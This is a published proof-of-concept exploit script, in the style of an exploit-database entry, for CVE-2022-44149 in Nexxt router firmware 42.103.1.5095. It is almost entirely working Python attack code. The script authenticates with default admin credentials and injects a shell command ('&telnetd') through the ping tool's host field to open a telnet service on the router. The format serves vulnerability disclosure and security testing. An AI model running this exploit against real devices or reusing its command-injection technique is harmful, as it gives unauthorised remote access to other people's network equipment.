# Exploit Title: Nexxt Router Firmware 42.103.1.5095 - Remote Code Execution (RCE) (Authenticated) # Date: 19/10/2022 # Exploit Author: Yerodin Richards # Vendor Homepage: https://www.nexxtsolutions.com/ # Version: 42.103.1.5095 # Tested on: ARN02304U8 # CVE : CVE-2022-44149 import requests import base64 router_host = "http://192.168.1.1" username = "admin" password = "admin" def main(): send_payload("&telnetd") print("connect to router using: `telnet "+router_host.split("//")[1]+ "` using known credentials") pass def gen_header(u, p): return base64.b64encode(f"{u}:{p}".encode("ascii")).decode("ascii") def send_payload(payload): url = router_host+"/goform/sysTools" headers = {"Authorization": "Basic {}".format(gen_header(username, password))} params = {"tool":"0", "pingCount":"4", "host": payload, "sumbit": "OK"} requests.post(url, headers=headers, data=params) if __name__ == '__main__': main()